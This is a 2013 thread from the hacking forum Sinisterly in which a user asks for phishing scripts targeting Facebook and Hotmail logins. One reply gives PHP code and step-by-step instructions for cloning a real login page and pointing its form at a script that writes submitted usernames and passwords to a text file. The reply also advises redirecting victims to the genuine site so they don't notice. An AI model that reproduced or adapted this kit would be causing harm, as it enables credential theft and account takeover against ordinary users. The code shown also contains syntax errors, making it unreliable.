Sinisterly
I need facebook and hotmail script - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Hacking (https://sinister.li/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.li/Forum-Website-Server-Hacking)
+--- Thread: I need facebook and hotmail script (/Thread-I-need-facebook-and-hotmail-script)



I need facebook and hotmail script - damo2mine - 06-17-2013

hi everyone. i need the phising script for hotmail and facebook . please pm me if you have it .


RE: I need facebook and hotmail script - Sirius - 06-17-2013

What about google? You're welcome.


RE: I need facebook and hotmail script - SQLi - 06-17-2013

It's simple as shit actually. Example:
Code:
<?php foreach ($_POST as $param_name => $param_val) { echo "$param_name: $param_val<br/>"; } ?> <form action="#" method="POST"> <input type="text" name="username" placeholder="username"/><br/> <input type="password" name="password" placeholder="password"/><br/> <input type="submit" value="Log in"/> </form>

1. CTRL+S and save the login page of facebook or whatever
2. Open it with notepad and CTRL+F search for "<form" and replace action with save.php
3. Save the login page and exit notepad, make a new file called save.php and put this in it:
Code:
<?php $input = file_get_contents("accounts.txt"); $2bstored .= "[" . date("F j, Y, g:i a") . "]\n"; foreach ($_POST as $param_name => $param_val) { $2bstored .= "$param_name: $param_val\n"; } $2bstored .= "\n\n" file_put_contents("accounts.txt", $input . $2bstored); ?>
There you have a simple phising script. You should add a redirect to the real webpage after the account has been stored though.